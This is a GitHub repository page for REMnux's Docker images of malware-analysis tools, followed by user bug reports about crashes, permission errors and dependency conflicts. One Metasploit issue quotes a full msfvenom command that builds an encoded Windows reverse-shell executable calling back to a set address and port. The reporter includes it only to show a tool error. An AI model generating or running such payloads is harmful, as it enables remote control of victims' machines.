
docker's Introduction

One aspect of the REMnux project involves providing Docker images of popular malware analysis tools, with the goal of allowing investigators to conveniently use difficult-to-install applications without having to install the REMnux distro. You can download and run existing images and contribute your own to the REMnux collection. You can also run the REMnux distro as a Docker container by using the prebuilt Docker image hosted in the REMnux repository on Docker Hub.

This GitHub repository hosts the Dockerfiles themselves. The resulting images are built and hosted at Docker Hub.

docker's People

Contributors

adricnet, digitalsleuth, imaia, julianvilas, lennyzeltser, malvidin, mattezell, ptcnop, sootysec, wzod


docker's Issues

NoneType has no attribute crits_message

After a clean install, I get the message below when accessing the default page:

'NoneType' object has no attribute 'crits_message'

Missing configuration?

Crits does not start cleanly after being stopped via the docker stop command

It looks like a docker start command after a Crits container was stopped fails because it tries to re-create the user nonroot even though this user already exists. If I look at the docker log for the container I see the following:
Traceback (most recent call last):
  File "/data/crits/manage.py", line 10, in <module>
    execute_from_command_line(sys.argv)
  File "/usr/local/lib/python2.7/dist-packages/django/core/management/__init__.py", line 399, in execute_from_command_line
    utility.execute()
  File "/usr/local/lib/python2.7/dist-packages/django/core/management/__init__.py", line 392, in execute
    self.fetch_command(subcommand).run_from_argv(self.argv)
  File "/usr/local/lib/python2.7/dist-packages/django/core/management/base.py", line 242, in run_from_argv
    self.execute(*args, **options.__dict__)
  File "/usr/local/lib/python2.7/dist-packages/django/core/management/base.py", line 285, in execute
    output = self.handle(*args, **options)
  File "/data/crits/crits/core/management/commands/users.py", line 173, in handle
    user = CRITsUser.create_user(username, password, email)
  File "/data/crits/crits/core/user.py", line 679, in create_user
    user.create_api_key("default", analyst, default=True)
  File "/data/crits/crits/core/user.py", line 583, in create_api_key
    self.save(username=analyst)
  File "/data/crits/crits/core/crits_mongoengine.py", line 361, in _custom_save
    _refs=_refs)
  File "/usr/local/lib/python2.7/dist-packages/mongoengine/document.py", line 286, in save
    raise NotUniqueError(message % unicode(err))
mongoengine.errors.NotUniqueError: Tried to save duplicate unique keys (insertDocument :: caused by :: 11000 E11000 duplicate key error index: crits.users.$username_1 dup key: { : "nonroot" })

Can this be fixed easily? I am quite new to Docker and don't know where to start.

Not working with latest mongodb

Well, using the latest mongodb version, crits server won't start. Not quite sure why. Had to fallback to the latest mongodb from ubuntu repository.

Issue running remnux/crits on Docker CE for Mac and Ubuntu

I have tried running this container on Docker for Mac but it keeps spitting out an error:

$ sudo docker run --rm -it -v ~/crits-data:/home/nonroot/workdir -p 8443:8443 remnux/crits
Unable to find image 'remnux/crits:latest' locally
latest: Pulling from remnux/crits
8aec416115fd: Pull complete
695f074e24e3: Pull complete
946d6c48c2a7: Pull complete
bc7277e579f0: Pull complete
2508cbcde94b: Pull complete
8c5f76692058: Pull complete
c9c95511d79b: Pull complete
9296ab42c531: Pull complete
8ab6493f5e9b: Pull complete
bf7fa77e3078: Pull complete
02d7f025eb5a: Pull complete
1b64f006a9e1: Pull complete
a741d2087cbb: Pull complete
Digest: sha256:f9daf8f6884f43066c2cb8662008903ced075c72d8da51f29fa0c3378086a85b
Status: Downloaded newer image for remnux/crits:latest
2017-03-29 12:08:55,093 CRIT Set uid to user 999
2017-03-29 12:08:55,113 INFO RPC interface 'supervisor' initialized
2017-03-29 12:08:55,113 CRIT Server 'unix_http_server' running without any HTTP authentication checking
2017-03-29 12:08:55,113 INFO supervisord started with pid 7
2017-03-29 12:08:56,121 INFO spawned: 'mongod' with pid 11
2017-03-29 12:08:56,123 INFO spawned: 'apache2' with pid 12
2017-03-29 12:08:57,173 INFO success: mongod entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2017-03-29 12:08:57,173 INFO success: apache2 entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
about to fork child process, waiting until server is ready for connections.
forked process: 82
child process started successfully, parent exiting
Traceback (most recent call last):
  File "/data/crits/manage.py", line 10, in <module>
    execute_from_command_line(sys.argv)
  File "/usr/local/lib/python2.7/dist-packages/django/core/management/__init__.py", line 354, in execute_from_command_line
    utility.execute()
  File "/usr/local/lib/python2.7/dist-packages/django/core/management/__init__.py", line 303, in execute
    settings.INSTALLED_APPS
  File "/usr/local/lib/python2.7/dist-packages/django/conf/__init__.py", line 48, in __getattr__
    self._setup(name)
  File "/usr/local/lib/python2.7/dist-packages/django/conf/__init__.py", line 44, in _setup
    self._wrapped = Settings(settings_module)
  File "/usr/local/lib/python2.7/dist-packages/django/conf/__init__.py", line 92, in __init__
    mod = importlib.import_module(self.SETTINGS_MODULE)
  File "/usr/lib/python2.7/importlib/__init__.py", line 37, in import_module
    __import__(name)
  File "/data/crits/crits/settings.py", line 117, in <module>
    execfile(dbfile)
ValueError: invalid \x escape

$ docker version
Client:
Version: 17.03.0-ce
API version: 1.26
Go version: go1.7.5
Git commit: 60ccb22
Built: Thu Feb 23 10:40:59 2017
OS/Arch: darwin/amd64

Server:
Version: 17.03.0-ce
API version: 1.26 (minimum version 1.12)
Go version: go1.7.5
Git commit: 3a232c8
Built: Tue Feb 28 07:52:04 2017
OS/Arch: linux/amd64
Experimental: true

I was getting this on an older version of the Docker for Mac beta, so I removed that and installed the current stable version; however, my issue still persists.

As such, I ran this against a fresh install on an Ubuntu Server box and I get the same outcome:

$ sudo docker run --rm -it -v ~/crits-data:/home/nonroot/workdir -p 8443:8443 remnux/crits
Unable to find image 'remnux/crits:latest' locally
latest: Pulling from remnux/crits
8aec416115fd: Pull complete
695f074e24e3: Pull complete
946d6c48c2a7: Pull complete
bc7277e579f0: Pull complete
2508cbcde94b: Pull complete
8c5f76692058: Pull complete
c9c95511d79b: Pull complete
9296ab42c531: Pull complete
8ab6493f5e9b: Pull complete
bf7fa77e3078: Pull complete
02d7f025eb5a: Pull complete
1b64f006a9e1: Pull complete
a741d2087cbb: Pull complete
Digest: sha256:f9daf8f6884f43066c2cb8662008903ced075c72d8da51f29fa0c3378086a85b
Status: Downloaded newer image for remnux/crits:latest
2017-03-29 12:20:15,255 CRIT Set uid to user 999
2017-03-29 12:20:15,276 INFO RPC interface 'supervisor' initialized
2017-03-29 12:20:15,276 CRIT Server 'unix_http_server' running without any HTTP authentication checking
2017-03-29 12:20:15,276 INFO supervisord started with pid 7
2017-03-29 12:20:16,279 INFO spawned: 'mongod' with pid 11
2017-03-29 12:20:16,281 INFO spawned: 'apache2' with pid 12
2017-03-29 12:20:17,676 INFO success: mongod entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2017-03-29 12:20:17,676 INFO success: apache2 entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
about to fork child process, waiting until server is ready for connections.
forked process: 75
child process started successfully, parent exiting
2017-03-29 12:20:33,399 INFO exited: mongod (exit status 48; not expected)
Traceback (most recent call last):
  File "/data/crits/manage.py", line 10, in <module>
    execute_from_command_line(sys.argv)
  File "/usr/local/lib/python2.7/dist-packages/django/core/management/__init__.py", line 354, in execute_from_command_line
    utility.execute()
  File "/usr/local/lib/python2.7/dist-packages/django/core/management/__init__.py", line 303, in execute
    settings.INSTALLED_APPS
  File "/usr/local/lib/python2.7/dist-packages/django/conf/__init__.py", line 48, in __getattr__
    self._setup(name)
  File "/usr/local/lib/python2.7/dist-packages/django/conf/__init__.py", line 44, in _setup
    self._wrapped = Settings(settings_module)
  File "/usr/local/lib/python2.7/dist-packages/django/conf/__init__.py", line 92, in __init__
    mod = importlib.import_module(self.SETTINGS_MODULE)
  File "/usr/lib/python2.7/importlib/__init__.py", line 37, in import_module
    __import__(name)
  File "/data/crits/crits/settings.py", line 117, in <module>
    execfile(dbfile)
ValueError: invalid \x escape

$ docker version
Client:
Version: 17.03.1-ce
API version: 1.27
Go version: go1.7.5
Git commit: c6d412e
Built: Mon Mar 27 17:14:09 2017
OS/Arch: linux/amd64

Server:
Version: 17.03.1-ce
API version: 1.27 (minimum version 1.12)
Go version: go1.7.5
Git commit: c6d412e
Built: Mon Mar 27 17:14:09 2017
OS/Arch: linux/amd64
Experimental: false

I've followed the install instructions and created the ~/crits-data folder and set the correct permissions on it, however no dice.

Is there anything obviously wrong that I am doing that would cause this issue?

Unicorn incompatibility between Speakeasy and Qiling

Hi, so I was working on using Qiling on REMnux and (after adding in the root filesystems and DLLs) noticed some issues with the Unicorn module, failing to import certain things (unicorn.const for example). After looking at the package versions, I eventually realized that while Speakeasy mandates the use of unicorn=1.0.2, Qiling depends on a newer version (unicorn>=2.0.1). I'm more interested in using Qiling because it supports a lot more OSs and architectures; I'm wondering if it's possible to include compatibility for both in REMnux.

Add public builds

It is not clear where the current builds of these containers are being done.

Given these are security tools it would be great to see the builds happening in a public build system to increase trust in built Docker containers. TravisCI, CircleCI or the Docker Hub build system would be great.

Happy to help on getting the builds into any of those or any other public build system.

dockerfile config changes

Hi, I am Srinivasa, working as a DevOps engineer. I created a simple Dockerfile for my application. I need to change some configuration of that application through the Dockerfile. Is there any way to change it after the WAR file is generated? Please help me with this.

Error: uninitialized constant Rex

Main Issue

I am running a docker image on a ubuntu ec2 instance. The command below fails on the ec2 instance but works on my local machine.

Command
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe

Output
/usr/local/bin/msfvenom:138:in `block in parse_args': uninitialized constant Rex (NameError)
	from /usr/local/rvm/rubies/ruby-2.3.1/lib/ruby/2.3.0/optparse.rb:1571:in `block in parse_in_order'
	from /usr/local/rvm/rubies/ruby-2.3.1/lib/ruby/2.3.0/optparse.rb:1527:in `catch'
	from /usr/local/rvm/rubies/ruby-2.3.1/lib/ruby/2.3.0/optparse.rb:1527:in `parse_in_order'
	from /usr/local/rvm/rubies/ruby-2.3.1/lib/ruby/2.3.0/optparse.rb:1521:in `order!'
	from /usr/local/rvm/rubies/ruby-2.3.1/lib/ruby/2.3.0/optparse.rb:1613:in `permute!'
	from /usr/local/rvm/rubies/ruby-2.3.1/lib/ruby/2.3.0/optparse.rb:1635:in `parse!'
	from /usr/local/bin/msfvenom:174:in `parse_args'
	from /usr/local/bin/msfvenom:287:in `<main>'

more info

The container works when I skip the update. This may be an issue upstream with Metasploit.

msfconsole can't be executed on a fresh container, because bundle is locked to activesupport

Installing warden 1.2.7
Installing addressable 2.7.0
Installing aws-sigv4 1.1.0
Installing em-socksify 0.3.2
Installing thin 1.7.2 with native extensions
Installing faraday 0.17.0
Installing jsobfu 0.4.2
Installing rex-socket 0.1.20
Gem::InstallError: rubyzip requires Ruby version >= 2.4.
An error occurred while installing rubyzip (2.0.0), and Bundler cannot continue.
Make sure that `gem install rubyzip -v '2.0.0'` succeeds before bundling.
root@b72975e0d3bb:/tmp/data# gem install rubyzip -v '2.0.0'
ERROR:  Error installing rubyzip:
	rubyzip requires Ruby version >= 2.4.
root@b72975e0d3bb:/tmp/data# msfconsole -q
Your bundle is locked to activesupport (4.2.11.1), but that version could not be found in any of the sources listed in your Gemfile. If you haven't changed sources, that means the author of activesupport (4.2.11.1) has removed it. You'll need to update your bundle to a different version of activesupport (4.2.11.1) that hasn't been removed in order to install.
Run `bundle install` to install missing gems.
root@b72975e0d3bb:/tmp/data#

After running:
gem update --system

This happens:

root@b72975e0d3bb:/tmp/data# msfconsole -q
Could not find activesupport-4.2.11.1 in any of the sources

Then

cd /opt/msf
bundle install

Returns:

Fetching rubyzip 2.0.0
Installing rubyzip 2.0.0
Gem::RuntimeRequirementNotMetError: rubyzip requires Ruby version >= 2.4. The current ruby version is 2.3.1.112.
An error occurred while installing rubyzip (2.0.0), and Bundler cannot continue.
Make sure that `gem install rubyzip -v '2.0.0' --source 'https://rubygems.org/'` succeeds before bundling.

In Gemfile:
  metasploit-framework was resolved to 5.0.54, which depends on
    metasploit-credential was resolved to 3.0.3, which depends on
      rubyzip
root@b72975e0d3bb:/opt/msf#

How can we solve the rubyzip installation?

No module named r2pipe

I'm using the latest version of the radare2 Docker image.
When I run a Python script from the container I get this error:
No module named r2pipe.
I tried to install it via pip install r2pipe, but I'm not a sudo user on the container.

How to run r2pipe package in the docker image?

ruby not installed

Since the latest pull, ruby and rvm are no longer present in the container. Therefore, executing msfconsole or other tools does not work, which renders the container useless.

Image: Viper - Build Code: bebvmjmpehchmegxdvpfnef - Fail on start

$ docker pull remnux/viper
Using default tag: latest
latest: Pulling from remnux/viper
428b411c28f0: Already exists
435050075b3f: Already exists
9fd3c8c9af32: Already exists
6d4946999d4f: Already exists
48a17bbb873c: Already exists
867807986fef: Already exists
27be8f6c8544: Already exists
2ba986d42ba3: Already exists
c97df9abfe2f: Already exists
ae7bd011e13b: Already exists
cf140d12eb70: Already exists
9cf0507a9518: Already exists
6dd8a12e04f3: Already exists
bd820b776c8a: Already exists
0a8c71adbf02: Already exists
5d4cc60cacd7: Already exists
a897f7d62db8: Already exists
6da6edfb4041: Already exists
023fa33a1f05: Already exists
490271e609b9: Already exists
c5cf2081ee4f: Already exists
Digest: sha256:5939b811f0e2e123768fa7bd2dacd3ea6d4aa0b5ed7718dfd0d7667c3f118a55
Status: Image is up to date for remnux/viper:latest
$ docker run --rm -it -v ~/viper:/home/nonroot/workdir remnux/viper
Traceback (most recent call last):
  File "../viper/viper.py", line 17, in <module>
    c = console.Console()
  File "/home/nonroot/viper/viper/core/ui/console.py", line 45, in __init__
    self.cmd = Commands()
  File "/home/nonroot/viper/viper/core/ui/commands.py", line 27, in __init__
    self.db = Database()
  File "/home/nonroot/viper/viper/core/database.py", line 147, in __init__
    Base.metadata.create_all(self.engine)
  File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/sql/schema.py", line 3622, in create_all
    tables=tables)
  File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/engine/base.py", line 1853, in _run_visitor
    with self._optional_conn_ctx_manager(connection) as conn:
  File "/usr/lib/python2.7/contextlib.py", line 17, in __enter__
    return self.gen.next()
  File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/engine/base.py", line 1846, in _optional_conn_ctx_manager
    with self.contextual_connect() as conn:
  File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/engine/base.py", line 2037, in contextual_connect
    self._wrap_pool_connect(self.pool.connect, None),
  File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/engine/base.py", line 2076, in _wrap_pool_connect
    e, dialect, self)
  File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/engine/base.py", line 1405, in _handle_dbapi_exception_noconnection
    exc_info
  File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/util/compat.py", line 199, in raise_from_cause
    reraise(type(exception), exception, tb=exc_tb)
  File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/engine/base.py", line 2072, in _wrap_pool_connect
    return fn()
  File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/pool.py", line 376, in connect
    return _ConnectionFairy._checkout(self)
  File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/pool.py", line 708, in _checkout
    fairy = _ConnectionRecord.checkout(pool)
  File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/pool.py", line 480, in checkout
    rec = pool._do_get()
  File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/pool.py", line 1146, in _do_get
    return self._create_connection()
  File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/pool.py", line 323, in _create_connection
    return _ConnectionRecord(self)
  File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/pool.py", line 449, in __init__
    self.connection = self.__connect()
  File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/pool.py", line 602, in __connect
    connection = self.__pool._invoke_creator(self)
  File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/engine/strategies.py", line 97, in connect
    return dialect.connect(*cargs, **cparams)
  File "/usr/local/lib/python2.7/dist-packages/sqlalchemy/engine/default.py", line 385, in connect
    return self.dbapi.connect(*cargs, **cparams)
sqlalchemy.exc.OperationalError: (sqlite3.OperationalError) unable to open database file

remnux/jsdetox console not defined.

I just downloaded the image and have been having issues executing seemingly simple code samples.

Sample submitted

console['\x6c\x6f\x67']('\x4e\x65\x74\x53\x65\x63\x20\x66\x6f\x72\x20\x74\x68\x65\x20\x77\x69\x6e\x21');

Decoded Form
console['log']('NetSec for the win!');

Error when selecting "Execute"

console is not defined (Line 1)

docker command
docker run --rm -d --name=js -p 3000:3000 remnux/jsdetox

error trace
at <eval>:1:1,/home/nonroot/jsdetox/lib/framework/jsengine_v8.rb:215:in `execute',/home/nonroot/jsdetox/app/controllers/backend.rb:32:in `block (2 levels) in <top (required)>',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/application/routing.rb:569:in `call',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/application/routing.rb:569:in `block in route',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/application/routing.rb:51:in `[]',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/application/routing.rb:51:in `block (3 levels) in process_destination_path',/var/lib/gems/1.9.1/gems/sinatra-1.3.6/lib/sinatra/base.rb:876:in `route_eval',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/application/routing.rb:51:in `block (2 levels) in process_destination_path',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/application/routing.rb:51:in `catch',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/application/routing.rb:51:in `block in process_destination_path',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/application/routing.rb:25:in `instance_eval',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/application/routing.rb:25:in `process_destination_path',(eval):134:in `block (2 levels) in inject_root_methods',(eval):124:in `catch',(eval):124:in `block in inject_root_methods',/var/lib/gems/1.9.1/gems/http_router-0.10.2/lib/http_router/node/root.rb:92:in `[]',/var/lib/gems/1.9.1/gems/http_router-0.10.2/lib/http_router.rb:119:in `block in call',/var/lib/gems/1.9.1/gems/http_router-0.10.2/lib/http_router.rb:119:in `catch',/var/lib/gems/1.9.1/gems/http_router-0.10.2/lib/http_router.rb:119:in `call',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/application/routing.rb:919:in `route!',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/application/routing.rb:909:in 
`dispatch!',/var/lib/gems/1.9.1/gems/sinatra-1.3.6/lib/sinatra/base.rb:794:in `block in call!',/var/lib/gems/1.9.1/gems/sinatra-1.3.6/lib/sinatra/base.rb:946:in `block in invoke',/var/lib/gems/1.9.1/gems/sinatra-1.3.6/lib/sinatra/base.rb:946:in `catch',/var/lib/gems/1.9.1/gems/sinatra-1.3.6/lib/sinatra/base.rb:946:in `invoke',/var/lib/gems/1.9.1/gems/sinatra-1.3.6/lib/sinatra/base.rb:794:in `call!',/var/lib/gems/1.9.1/gems/sinatra-1.3.6/lib/sinatra/base.rb:780:in `call',/var/lib/gems/1.9.1/gems/rack-1.6.0/lib/rack/session/abstract/id.rb:225:in `context',/var/lib/gems/1.9.1/gems/rack-1.6.0/lib/rack/session/abstract/id.rb:220:in `call',/var/lib/gems/1.9.1/gems/sass-3.4.13/lib/sass/plugin/rack.rb:54:in `call',/var/lib/gems/1.9.1/gems/rack-1.6.0/lib/rack/head.rb:13:in `call',/var/lib/gems/1.9.1/gems/rack-1.6.0/lib/rack/methodoverride.rb:22:in `call',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/reloader.rb:250:in `call',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/logger.rb:388:in `call',/var/lib/gems/1.9.1/gems/sinatra-1.3.6/lib/sinatra/showexceptions.rb:21:in `call',/var/lib/gems/1.9.1/gems/sinatra-1.3.6/lib/sinatra/base.rb:1417:in `block in call',/var/lib/gems/1.9.1/gems/sinatra-1.3.6/lib/sinatra/base.rb:1499:in `synchronize',/var/lib/gems/1.9.1/gems/sinatra-1.3.6/lib/sinatra/base.rb:1417:in `call',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/router.rb:83:in `block in call',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/router.rb:76:in `each',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/router.rb:76:in `call',/var/lib/gems/1.9.1/gems/rack-1.6.0/lib/rack/handler/webrick.rb:89:in `service',/usr/lib/ruby/1.9.1/webrick/httpserver.rb:138:in `service',/usr/lib/ruby/1.9.1/webrick/httpserver.rb:94:in `run',/usr/lib/ruby/1.9.1/webrick/server.rb:191:in `block in start_thread'

Need help with thug shared log folder perms

Using the invocation from the docs, thug works great, but I'm having trouble when I try to share a folder into it. It errors out on permissions... sometimes. E.g.:

$ docker run --rm -it -v ~/Desktop/mess/thuglogs:/home/thug/logs remnux/thug ./thug.py 'http://google.com'

Traceback (most recent call last):
  File "./thug.py", line 242, in <module>
    Thug(sys.argv[1:])()
  File "/home/thug/src/ThugAPI/ThugAPI.py", line 63, in __call__
    self.analyze()
  File "./thug.py", line 221, in analyze
    self.log_init(args[0])
  File "/home/thug/src/ThugAPI/ThugAPI.py", line 185, in log_init
    log.ThugLogging.set_basedir(url)
  File "/home/thug/src/Logging/BaseLogging.py", line 59, in set_basedir
    os.makedirs(self.baseDir)
  File "/usr/lib/python2.7/os.py", line 157, in makedirs
    mkdir(name, mode)
OSError: [Errno 13] Permission denied: '../logs/4be8c7ad7ca1a9ecd27ab96956468ca8/20150108173240'

Maybe it is creating a folder that the next thug Docker instance can't access unless perms in/of the shared thuglogs folder are reset between invocations. This has helped between invocations, but I don't understand what's causing it:

$ chmod -R o+rwx thuglogs/

By running bash rather than thug in a thug container to take a peek we can see the user id mapping is off but the perms look okay:

thug@8c7d174f26e9:~/src$ ls -ld ~/logs/
drwxrwxrwx 1 1000 staff 272 Jan  8 17:32 /home/thug/logs/

lorelei:mess adric$ ls -ld thuglogs
drwxrwxrwx  8 adric  staff  272 Jan  8 12:32 thuglogs

but a run of thug also fails similarly as above (trimmed):

OSError: [Errno 13] Permission denied: '../logs/67ef91b090ead0b6426960bc5f7cc059/20150108175411'

This folder and all of them are there, but empty.

thug@38edce58f9bc:~/src$ ls -a ~/logs/*/
/home/thug/logs/4be8c7ad7ca1a9ecd27ab96956468ca8/:
.  ..

/home/thug/logs/67ef91b090ead0b6426960bc5f7cc059/:
.  ..

/home/thug/logs/873c87c71f8bf1d15a53ce0c0676971f/:
.  ..

/home/thug/logs/c02b57cf40deb5dd86bf434fc7d4f68f/:
.  ..

/home/thug/logs/c0fd94d2694ae2ac06f5abe87a987b5d/:
.  ..

/home/thug/logs/c7b920f57e553df2bb68272f61570210/:
.  ..

Please help, thanks,
adric

Issues with Sysdig Repo

Hi, at the moment it seems that there are issues with the apt repo of draios.

When trying to use the docker container there are multiple errors using apt.

I tried to reach http://download.draios.com/stable/deb/draios.list manually and it gives an HTTP error 403.

403 Forbidden

Code: AccessDenied
Message: Access Denied
RequestId: EC1XSMFDR3CT780M
HostId: AoCU4+3P7hBfGNW6pToS04/owVC9DgUJQCeoA4S9Lfze0e8DHFnujOeSeQkpRNwNA2vnxOeNMT4=

Large caches left in image

The Docker image contains two large(r) cache directories:

699M /var/cache/salt
274M /root/.cache

These look like installation artifacts; could they be removed from the image?

no graph.svg

Hi

Been using REMnux distro and in particular the docker image of thug (honeyclient). Very good tool and distro.

Recently I have updated REMnux and thug and for some reason thug is not producing the graph.svg file within analysis folder anymore. I use the command ./thug.py -FZ "[URL]" but I do not get a graph.svg file.

I have installed the latest distro (from website) and updated all items within but still no avail.

Speaking to buffer regarding thug, he has stated that there are no issues with thug.

Please could you assist.

Thanks
